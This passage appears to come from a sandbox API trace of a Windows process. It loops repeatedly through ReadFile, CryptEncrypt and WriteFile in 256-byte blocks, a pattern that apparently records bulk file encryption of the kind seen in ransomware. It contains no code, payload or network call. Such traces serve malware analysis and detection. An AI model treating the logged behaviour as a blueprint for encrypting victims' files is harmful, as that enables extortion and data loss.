pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.772] GetLastError () returned 0x0 [0167.772] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.773] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.773] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.773] GetLastError () returned 0x0 [0167.773] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.773] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.773] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.773] GetLastError () returned 0x0 [0167.773] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.773] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.773] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.773] GetLastError () returned 0x0 [0167.773] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.773] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.773] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.773] GetLastError () returned 0x0 [0167.773] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.774] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.774] GetLastError () returned 0x0 [0167.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.774] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.774] GetLastError () returned 0x0 [0167.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.774] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.774] GetLastError () returned 0x0 [0167.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.774] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.774] GetLastError () returned 0x0 [0167.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.774] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.774] GetLastError () returned 0x0 [0167.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.774] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.774] GetLastError () returned 0x0 [0167.774] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.774] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.775] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.775] GetLastError () returned 0x0 [0167.775] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.775] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.775] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.775] GetLastError () returned 0x0 [0167.775] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.775] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.775] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.775] GetLastError () returned 0x0 [0167.775] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.775] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.775] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.775] GetLastError () returned 0x0 [0167.775] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.775] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.775] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.775] GetLastError () returned 0x0 [0167.775] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.775] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.775] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.775] GetLastError () returned 0x0 [0167.775] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.775] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.776] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.776] GetLastError () returned 0x0 [0167.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.776] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.776] GetLastError () returned 0x0 [0167.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.776] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.776] GetLastError () returned 0x0 [0167.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.776] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.776] GetLastError () returned 0x0 [0167.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.776] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.776] GetLastError () returned 0x0 [0167.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.776] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.776] GetLastError () returned 0x0 [0167.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.777] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.777] GetLastError () returned 0x0 [0167.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.777] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.777] GetLastError () returned 0x0 [0167.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.777] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.777] GetLastError () returned 0x0 [0167.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.777] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.777] GetLastError () returned 0x0 [0167.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.777] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.777] GetLastError () returned 0x0 [0167.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.777] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.777] GetLastError () returned 0x0 [0167.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError () returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.778] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError () returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.778] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError () returned 0x0 [0167.778] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.778] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.778] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.778] GetLastError 